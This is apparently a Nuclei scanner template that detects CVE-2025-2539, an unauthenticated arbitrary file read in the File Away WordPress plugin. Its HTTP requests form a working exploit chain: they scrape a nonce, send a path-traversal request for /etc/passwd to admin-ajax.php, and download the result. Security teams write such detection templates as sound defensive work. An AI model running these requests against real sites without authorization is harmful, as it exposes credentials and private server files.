id: CVE-2025-2539

info:
  name: File Away <= 3.9.9.0.1 - Missing Authorization to Unauthenticated Arbitrary File Read
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    The File Away plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the ajax() function in all versions up to, and including, 3.9.9.0.1. This makes it possible for unauthenticated attackers, leveraging the use of a reversible weak algorithm, to read the contents of arbitrary files on the server, which can contain sensitive information.
  impact: |
    Unauthenticated attackers can exploit weak encryption and missing authorization to read arbitrary files from the server, potentially exposing sensitive documents, configuration files, and user data.
  remediation: |
    Upgrade to File Away version 3.9.9.1 or later that implements proper capability checks and stronger encryption.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/file-away/file-away-39901-missing-authorization-to-unauthenticated-arbitrary-file-read
    - https://plugins.trac.wordpress.org/browser/file-away/trunk/lib/cls/class.fileaway_encrypted.php
    - https://plugins.trac.wordpress.org/browser/file-away/trunk/lib/cls/class.fileaway_stats.php
    - https://wordpress.org/plugins/file-away/#developers
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/5b23bd5c-db27-4d63-8461-1f36958a2ff6?source=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-2539
    cwe-id: CWE-327
    epss-score: 0.20718
    epss-percentile: 0.95745
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "/wp-content/plugins/file-away/"
  tags: cve,cve2025,lfi,file-away,wordpress,wp-plugin,wp,vkev,vuln

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - 'fileaway_stats.*admin-ajax.php","nonce":"([0-9a-zA-Z]+)"}'
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        action=fileaway-stats&nonce={{nonce}}&file=/../../../../../../../../etc/passwd

    matchers:
      - type: word
        part: body
        internal: true
        words:
          - fileaway_download

    extractors:
      - type: regex
        part: body
        internal: true
        name: download_url
        group: 1
        regex:
          - '".*(\?.*?)"'

  - raw:
      - |
        GET /{{download_url}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'root:.*:0:0:'

      - type: word
        part: content_type
        words:
          - "application/force-download"
# digest: 4b0a00483046022100f460fc7edeac00c3743a5a56177c3d085079c0eaebc446c63e0995c7f8627afa022100f55c82281c03b3ccbbb54782e1758298606f49c5d860ad6898e2382d4a43e9b7:922c64590222798bb761d5b6d8e72950